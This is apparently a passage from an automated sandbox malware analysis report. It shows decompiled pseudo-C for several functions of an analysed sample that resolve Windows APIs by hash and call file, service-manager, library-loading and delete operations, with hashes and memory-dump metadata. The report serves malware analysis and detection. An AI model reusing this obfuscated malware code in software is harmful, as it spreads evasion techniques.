                                                                      • Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction ID: 356f3b95ddaaa167dd82075bba60e0d4b8753b8399a247414e87281e072a6ffd
                                                                      • Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction Fuzzy Hash: 1121E672800248BBDF159F95CD09CDFBF79FF89714F008158FA1466160D7B69A60DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040471A, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 58%
                                                                      			E0040471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t50;
				intOrPtr* _t61;
				void* _t62;
				signed int _t63;
				signed int _t64;

				E00412550(_t50);
				_v20 = 0xf336;
				_v20 = _v20 + 0x29f7;
				_v20 = _v20 ^ 0x000152a0;
				_v8 = 0xc9c4;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 << 3;
				_t63 = 0x6d;
				_v8 = _v8 * 0x43;
				_v8 = _v8 ^ 0x0000467c;
				_v16 = 0x763b;
				_t64 = 0x2d;
				_v16 = _v16 / _t63;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x000058e5;
				_v12 = 0x527e;
				_v12 = _v12 / _t64;
				_v12 = _v12 | 0xd776a7a3;
				_v12 = _v12 ^ 0xd776f938;
				_t61 = E00407378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
				return _t62;
			}












                                                                      0x0040473b
                                                                      0x00404740
                                                                      0x0040474a
                                                                      0x00404753
                                                                      0x0040475a
                                                                      0x00404761
                                                                      0x00404765
                                                                      0x0040476f
                                                                      0x00404772
                                                                      0x00404775
                                                                      0x0040477c
                                                                      0x00404788
                                                                      0x00404789
                                                                      0x0040478e
                                                                      0x00404792
                                                                      0x00404799
                                                                      0x004047aa
                                                                      0x004047ad
                                                                      0x004047b4
                                                                      0x004047d3
                                                                      0x004047e4
                                                                      0x004047ea

                                                                      APIs
                                                                      • SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 004047E4
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FolderPath
                                                                      • String ID:
                                                                      • API String ID: 1514166925-0
                                                                      • Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction ID: 65912959230b40fcbc033ffb5be77358307eff91cf09a66e6c6d15bb7c7ea9d8
                                                                      • Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction Fuzzy Hash: 27210372D01208FBEF15DFE5C94A8DEBBB5EF05354F108089E924A6250D3B99B10DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041C0C8, Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 53%
                                                                      			E0041C0C8(long __ecx, long __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, long _a20, intOrPtr _a24, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t40;
				void* _t48;
				long _t52;
				long _t53;

				_t52 = __edx;
				_push(0);
				_push(_a36);
				_t53 = __ecx;
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00412550(_t40);
				_v20 = 0xb477;
				_v20 = _v20 >> 0x10;
				_v20 = _v20 ^ 0x000000e5;
				_v16 = 0xb312;
				_v16 = _v16 + 0x2a6f;
				_v16 = _v16 ^ 0x0000d90b;
				_v12 = 0x5a0b;
				_v12 = _v12 + 0x400b;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x09a119a3;
				_v8 = 0x3388;
				_v8 = _v8 + 0x85f8;
				_v8 = _v8 * 0x5a;
				_v8 = _v8 ^ 0x00415e39;
				E00407378(__ecx, 0x81a8678d, __ecx, 0x90f109b3, 0x2bf);
				_t48 = CreateFileW(_a8, _t52, _t53, 0, _a32, _a20, 0); // executed
				return _t48;
			}











                                                                      0x0041c0d3
                                                                      0x0041c0d5
                                                                      0x0041c0d6
                                                                      0x0041c0d9
                                                                      0x0041c0db
                                                                      0x0041c0de
                                                                      0x0041c0df
                                                                      0x0041c0e2
                                                                      0x0041c0e5
                                                                      0x0041c0e8
                                                                      0x0041c0eb
                                                                      0x0041c0ee
                                                                      0x0041c0f1
                                                                      0x0041c0f2
                                                                      0x0041c0f3
                                                                      0x0041c0f8
                                                                      0x0041c102
                                                                      0x0041c106
                                                                      0x0041c10d
                                                                      0x0041c114
                                                                      0x0041c11b
                                                                      0x0041c122
                                                                      0x0041c129
                                                                      0x0041c130
                                                                      0x0041c134
                                                                      0x0041c13b
                                                                      0x0041c142
                                                                      0x0041c15d
                                                                      0x0041c160
                                                                      0x0041c174
                                                                      0x0041c189
                                                                      0x0041c191

                                                                      APIs
                                                                      • CreateFileW.KERNEL32(0000D90B,?,D583BA2A,00000000,?,0ACC4A3C,00000000), ref: 0041C189
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
                                                                      • Instruction ID: 96c25dcb005bf8d5b9239a355ff64305c2a40b8adff4105ffeb7b2e547fc0458
                                                                      • Opcode Fuzzy Hash: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
                                                                      • Instruction Fuzzy Hash: AF21E2B290020CBFEF019F95DD498DEBBB9EB45358F108199F92462250D7B69E24DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041340E, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 86%
                                                                      			E0041340E(void* __ecx, void* __edx, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				void* _t45;
				void* _t57;
				signed int _t59;
				signed int _t60;

				_push(_a12);
				_push(0);
				_push(0);
				E00412550(_t45);
				_v28 = 0x755cc3;
				_v24 = 0;
				_v20 = 0xc93f;
				_v20 = _v20 >> 3;
				_t59 = 0x1a;
				_v20 = _v20 / _t59;
				_v20 = _v20 ^ 0x00003660;
				_v16 = 0x16ad;
				_v16 = _v16 + 0x57a7;
				_v16 = _v16 | 0xbe0b763b;
				_v16 = _v16 ^ 0xbe0b2e9f;
				_v12 = 0xa207;
				_v12 = _v12 + 0xb6;
				_t60 = 0x37;
				_v12 = _v12 * 0x38;
				_v12 = _v12 ^ 0x0023dbd3;
				_v8 = 0xebb1;
				_v8 = _v8 / _t60;
				_v8 = _v8 | 0x19ad118e;
				_v8 = _v8 ^ 0x19ad0924;
				E00407378(_t60, 0x3e7f6fd6, _t60, 0x2daf77dd, 0x231);
				_t57 = OpenSCManagerW(0, 0, _a12); // executed
				return _t57;
			}













                                                                      0x00413415
                                                                      0x0041341a
                                                                      0x0041341b
                                                                      0x0041341e
                                                                      0x00413423
                                                                      0x0041342d
                                                                      0x00413432
                                                                      0x00413439
                                                                      0x00413442
                                                                      0x00413447
                                                                      0x0041344c
                                                                      0x00413453
                                                                      0x0041345a
                                                                      0x00413461
                                                                      0x00413468
                                                                      0x0041346f
                                                                      0x00413476
                                                                      0x00413481
                                                                      0x0041348d
                                                                      0x00413490
                                                                      0x00413497
                                                                      0x004134a8
                                                                      0x004134ab
                                                                      0x004134b2
                                                                      0x004134c6
                                                                      0x004134d3
                                                                      0x004134d9

                                                                      APIs
                                                                      • OpenSCManagerW.SECHOST(00000000,00000000,00003660,?,?,?,?,?,?,?,?,?,B0D9BF73), ref: 004134D3
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ManagerOpen
                                                                      • String ID:
                                                                      • API String ID: 1889721586-0
                                                                      • Opcode ID: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
                                                                      • Instruction ID: 79fc8a61bc147dd9eb73d6e5127b7a4b6440501786f95933ed8e48a6fc7eff6b
                                                                      • Opcode Fuzzy Hash: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
                                                                      • Instruction Fuzzy Hash: 372115B1D0131DBBDB14DFA9C84A8DFBBB5FB00314F10819AE414AA240D3B55B14CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00410321, Relevance: 1.6, APIs: 1, Instructions: 59serviceCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 79%
                                                                      			E00410321(void* __ecx, int __edx, intOrPtr _a4, intOrPtr _a8, short* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				void* _t56;
				void* _t59;
				int _t60;

				_push(_a12);
				_t60 = __edx;
				_t59 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00412550(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xc39a9;
				_v20 = 0xd5ea;
				_v20 = _v20 | 0xff6e49b2;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0xfeddf181;
				_v12 = 0x5ebb;
				_v12 = _v12 * 0x36;
				_v12 = _v12 * 0x4e;
				_v12 = _v12 | 0x0415626f;
				_v12 = _v12 ^ 0x0617d8e0;
				_v16 = 0xb467;
				_v16 = _v16 << 4;
				_v16 = _v16 * 0x58;
				_v16 = _v16 ^ 0x03e03a17;
				_v8 = 0xc80e;
				_v8 = _v8 * 5;
				_v8 = _v8 * 0x5d;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x000b2851;
				E00407378(__ecx, 0x612723fe, __ecx, 0x2daf77dd, 0x10e);
				_t56 = OpenServiceW(_t59, _a12, _t60); // executed
				return _t56;
			}













                                                                      0x00410329
                                                                      0x0041032c
                                                                      0x0041032e
                                                                      0x00410330
                                                                      0x00410333
                                                                      0x00410336
                                                                      0x00410337
                                                                      0x00410338
                                                                      0x0041033d
                                                                      0x00410344
                                                                      0x0041034b
                                                                      0x00410352
                                                                      0x00410359
                                                                      0x0041035c
                                                                      0x00410363
                                                                      0x0041037e
                                                                      0x00410386
                                                                      0x00410389
                                                                      0x00410390
                                                                      0x00410397
                                                                      0x0041039e
                                                                      0x004103a6
                                                                      0x004103a9
                                                                      0x004103b0
                                                                      0x004103bb
                                                                      0x004103c2
                                                                      0x004103c5
                                                                      0x004103c9
                                                                      0x004103dc
                                                                      0x004103e9
                                                                      0x004103f0

                                                                      APIs
                                                                      • OpenServiceW.SECHOST(?,FEDDF181,B0D9BF73,?,?,?,?,?,?,?,?,00000000,B0D9BF73), ref: 004103E9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: OpenService
                                                                      • String ID:
                                                                      • API String ID: 3098006287-0
                                                                      • Opcode ID: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
                                                                      • Instruction ID: c6d73ecbffe5406a28a349e9ef787ac1ab0e0a83b516e509f45a9a70e8a66525
                                                                      • Opcode Fuzzy Hash: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
                                                                      • Instruction Fuzzy Hash: 9121DFB1C01209BBDB14DFA5CA8A8DEBFB4EB45308F10819AE825B6251D3B49B54DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004149CF, Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 95%
                                                                      			E004149CF(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t52;
				struct HINSTANCE__* _t65;
				signed int _t67;
				signed int _t68;
				signed int _t69;

				_push(_a4);
				E00412550(_t52);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x2e62bd;
				_v12 = 0x9175;
				_v12 = _v12 >> 3;
				_v12 = _v12 >> 4;
				_t67 = 0x72;
				_v12 = _v12 / _t67;
				_v12 = _v12 ^ 0x00007d95;
				_v20 = 0x6b8f;
				_v20 = _v20 + 0xab5d;
				_v20 = _v20 ^ 0x000118a2;
				_v16 = 0x74fd;
				_v16 = _v16 + 0xb2f4;
				_v16 = _v16 | 0x45835894;
				_v16 = _v16 ^ 0x45831718;
				_v8 = 0x475a;
				_t68 = 0x1a;
				_v8 = _v8 / _t68;
				_t69 = 0x71;
				_v8 = _v8 / _t69;
				_v8 = _v8 | 0x9a1a6af5;
				_v8 = _v8 ^ 0x9a1a601d;
				E00407378(_t69, 0xd3779e90, _t69, 0x90f109b3, 0xd8);
				_t65 = LoadLibraryW(_a4); // executed
				return _t65;
			}














                                                                      0x004149d5
                                                                      0x004149da
                                                                      0x004149df
                                                                      0x004149e6
                                                                      0x004149ef
                                                                      0x004149f6
                                                                      0x004149fa
                                                                      0x00414a03
                                                                      0x00414a08
                                                                      0x00414a0d
                                                                      0x00414a14
                                                                      0x00414a1b
                                                                      0x00414a22
                                                                      0x00414a29
                                                                      0x00414a30
                                                                      0x00414a37
                                                                      0x00414a3e
                                                                      0x00414a45
                                                                      0x00414a4f
                                                                      0x00414a54
                                                                      0x00414a5c
                                                                      0x00414a64
                                                                      0x00414a67
                                                                      0x00414a6e
                                                                      0x00414a8d
                                                                      0x00414a98
                                                                      0x00414a9d

                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(00007D95), ref: 00414A98
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
                                                                      • Instruction ID: 9989af87aff6ab64ab2fd442203f787e6bef76968d5278ac6d26aaebc056c565
                                                                      • Opcode Fuzzy Hash: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
                                                                      • Instruction Fuzzy Hash: 6A2129B5E0020CFBEB04CFE5C94A9EEBBB1EB40304F10C099E518A7291D7B96B549B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004141CA, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 58%
                                                                      			E004141CA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t42;
				intOrPtr* _t50;
				void* _t51;
				signed int _t53;
				void* _t57;

				_t57 = __ecx;
				E00412550(_t42);
				_v20 = 0x33dd;
				_t53 = 0x60;
				_v20 = _v20 / _t53;
				_v20 = _v20 ^ 0x0000445b;
				_v8 = 0x98b2;
				_v8 = _v8 << 0xa;
				_v8 = _v8 | 0x9f0dae98;
				_v8 = _v8 + 0xffff2dd8;
				_v8 = _v8 ^ 0x9f6f2800;
				_v16 = 0x7a4d;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x630ec107;
				_v16 = _v16 ^ 0x6301fd0c;
				_v12 = 0xd3a1;
				_v12 = _v12 ^ 0x9b5a4994;
				_v12 = _v12 + 0xffffbec0;
				_v12 = _v12 ^ 0x9b5a0da8;
				_t50 = E00407378(_t53, 0x7c314b7f, _t53, 0x90f109b3, 0x1d9);
				_t51 =  *_t50(_t57, 0, _a12, 0x28, __ecx, __edx, _a4, _a8, _a12, 0, _a20, 0x28); // executed
				return _t51;
			}












                                                                      0x004141d6
                                                                      0x004141e5
                                                                      0x004141ea
                                                                      0x004141fb
                                                                      0x00414203
                                                                      0x00414206
                                                                      0x0041420d
                                                                      0x00414214
                                                                      0x00414218
                                                                      0x0041421f
                                                                      0x00414226
                                                                      0x0041422d
                                                                      0x00414234
                                                                      0x00414238
                                                                      0x0041423f
                                                                      0x00414246
                                                                      0x0041424d
                                                                      0x00414254
                                                                      0x0041425b
                                                                      0x0041427a
                                                                      0x0041428a
                                                                      0x00414290

                                                                      APIs
                                                                      • SetFileInformationByHandle.KERNELBASE(0026A181,00000000,0000445B,00000028), ref: 0041428A
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileHandleInformation
                                                                      • String ID:
                                                                      • API String ID: 3935143524-0
                                                                      • Opcode ID: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
                                                                      • Instruction ID: a3e86e75239e17fb171a25c98b6967d435d8d6a60c5aeb02e3fa6803c78aa2b8
                                                                      • Opcode Fuzzy Hash: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
                                                                      • Instruction Fuzzy Hash: 9A114A72E00309BBEB14DFA4CC4AAAEBBB5EF44714F108089E92466291D7B55B509F81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405AB8, Relevance: 1.6, APIs: 1, Instructions: 51serviceCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 86%
                                                                      			E00405AB8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				int _t57;
				signed int _t59;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00412550(_t47);
				_v20 = 0xc8c;
				_v20 = _v20 + 0xffffaa04;
				_v20 = _v20 ^ 0xb702763d;
				_v20 = _v20 ^ 0x48fdd1a6;
				_v16 = 0xeb1c;
				_v16 = _v16 << 4;
				_t59 = 0xf;
				_v16 = _v16 * 0xe;
				_v16 = _v16 + 0xffff64c4;
				_v16 = _v16 ^ 0x00cd6bec;
				_v12 = 0x757;
				_v12 = _v12 ^ 0x4183b2e4;
				_v12 = _v12 << 2;
				_v12 = _v12 / _t59;
				_v12 = _v12 ^ 0x0067440e;
				_v8 = 0xa082;
				_v8 = _v8 >> 1;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0xcec43627;
				_v8 = _v8 ^ 0xcec45939;
				E00407378(_t59, 0x114af6f7, _t59, 0x2daf77dd, 0x11f);
				_t57 = CloseServiceHandle(_a12); // executed
				return _t57;
			}










                                                                      0x00405abe
                                                                      0x00405ac1
                                                                      0x00405ac4
                                                                      0x00405ac9
                                                                      0x00405ace
                                                                      0x00405ad8
                                                                      0x00405ae1
                                                                      0x00405ae8
                                                                      0x00405aef
                                                                      0x00405af6
                                                                      0x00405b00
                                                                      0x00405b0b
                                                                      0x00405b0e
                                                                      0x00405b15
                                                                      0x00405b1c
                                                                      0x00405b23
                                                                      0x00405b2a
                                                                      0x00405b34
                                                                      0x00405b37
                                                                      0x00405b3e
                                                                      0x00405b45
                                                                      0x00405b48
                                                                      0x00405b4c
                                                                      0x00405b53
                                                                      0x00405b6c
                                                                      0x00405b77
                                                                      0x00405b7c

                                                                      APIs
                                                                      • CloseServiceHandle.SECHOST(48FDD1A6), ref: 00405B77
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandleService
                                                                      • String ID:
                                                                      • API String ID: 1725840886-0
                                                                      • Opcode ID: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
                                                                      • Instruction ID: 1506a155f76b4c60e4096a1e21d349610d66aa9e8fe33e5f3d9433cf1ec1cd13
                                                                      • Opcode Fuzzy Hash: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
                                                                      • Instruction Fuzzy Hash: 45110371D0020DFFDB08DFA9C94A8EEBBB0FB40304F108599E925A6291D7B99B55DF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040E554, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 90%
                                                                      			E0040E554(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t42;
				int _t51;
				signed int _t53;
				struct _SHFILEOPSTRUCTW* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E00412550(_t42);
				_v20 = 0xead4;
				_v20 = _v20 + 0xffff9be4;
				_v20 = _v20 ^ 0x000085bc;
				_v16 = 0x46f7;
				_v16 = _v16 << 0xe;
				_v16 = _v16 << 7;
				_t53 = 0x39;
				_v16 = _v16 / _t53;
				_v16 = _v16 ^ 0x03e8aab4;
				_v12 = 0x2beb;
				_v12 = _v12 ^ 0xafae01c3;
				_v12 = _v12 + 0xffff58eb;
				_v12 = _v12 ^ 0xa5118136;
				_v12 = _v12 ^ 0x0abc415f;
				_v8 = 0xa691;
				_v8 = _v8 ^ 0x7591c523;
				_v8 = _v8 << 0xa;
				_v8 = _v8 + 0x20df;
				_v8 = _v8 ^ 0x458ea297;
				E00407378(_t53, 0x11ef7293, _t53, 0xd20b8aa4, 0x23a);
				_t51 = SHFileOperationW(_t57); // executed
				return _t51;
			}











                                                                      0x0040e55b
                                                                      0x0040e55e
                                                                      0x0040e560
                                                                      0x0040e562
                                                                      0x0040e567
                                                                      0x0040e571
                                                                      0x0040e57a
                                                                      0x0040e581
                                                                      0x0040e588
                                                                      0x0040e58c
                                                                      0x0040e595
                                                                      0x0040e59d
                                                                      0x0040e5a0
                                                                      0x0040e5a7
                                                                      0x0040e5ae
                                                                      0x0040e5b5
                                                                      0x0040e5bc
                                                                      0x0040e5c3
                                                                      0x0040e5ca
                                                                      0x0040e5d1
                                                                      0x0040e5d8
                                                                      0x0040e5dc
                                                                      0x0040e5e3
                                                                      0x0040e602
                                                                      0x0040e60b
                                                                      0x0040e611

                                                                      APIs
                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?,?,?,?), ref: 0040E60B
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileOperation
                                                                      • String ID:
                                                                      • API String ID: 3080627654-0
                                                                      • Opcode ID: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
                                                                      • Instruction ID: 3dd06e24261158741585346e8f940a6ca427a5f61c4d66b0dbfef3b0e1201222
                                                                      • Opcode Fuzzy Hash: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
                                                                      • Instruction Fuzzy Hash: 961123B1D01318BBEB18DFA5C84A8DEBBB4FB00718F108598E825B6241D3B95B44DB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040EB1E, Relevance: 1.5, APIs: 1, Instructions: 43fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 82%
                                                                      			E0040EB1E(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t34;
				int _t44;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00412550(_t34);
				_v8 = 0xd1b2;
				_v8 = _v8 * 0x63;
				_v8 = _v8 << 4;
				_v8 = _v8 * 0x74;
				_v8 = _v8 ^ 0x4bec8e88;
				_v20 = 0x1fc5;
				_v20 = _v20 + 0x9c84;
				_v20 = _v20 ^ 0x0000b099;
				_v16 = 0x542c;
				_v16 = _v16 | 0x3ba7d0a3;
				_v16 = _v16 ^ 0x3ba7e6ce;
				_v12 = 0x8319;
				_v12 = _v12 * 0x45;
				_v12 = _v12 + 0xffff39a4;
				_v12 = _v12 ^ 0x0022b84c;
				E00407378(__ecx, 0x497c0ce2, __ecx, 0x90f109b3, 0x28d);
				_t44 = DeleteFileW(_a8); // executed
				return _t44;
			}









                                                                      0x0040eb24
                                                                      0x0040eb27
                                                                      0x0040eb2b
                                                                      0x0040eb2c
                                                                      0x0040eb31
                                                                      0x0040eb49
                                                                      0x0040eb4c
                                                                      0x0040eb5b
                                                                      0x0040eb5e
                                                                      0x0040eb65
                                                                      0x0040eb6c
                                                                      0x0040eb73
                                                                      0x0040eb7a
                                                                      0x0040eb81
                                                                      0x0040eb88
                                                                      0x0040eb8f
                                                                      0x0040eb9a
                                                                      0x0040eb9d
                                                                      0x0040eba4
                                                                      0x0040ebb7
                                                                      0x0040ebc2
                                                                      0x0040ebc7

                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(3BA7E6CE), ref: 0040EBC2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
                                                                      • Instruction ID: 1a862a12ce259b9b594eaf605fcacc0ae33b71988d820ce1279c505093e24a3a
                                                                      • Opcode Fuzzy Hash: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
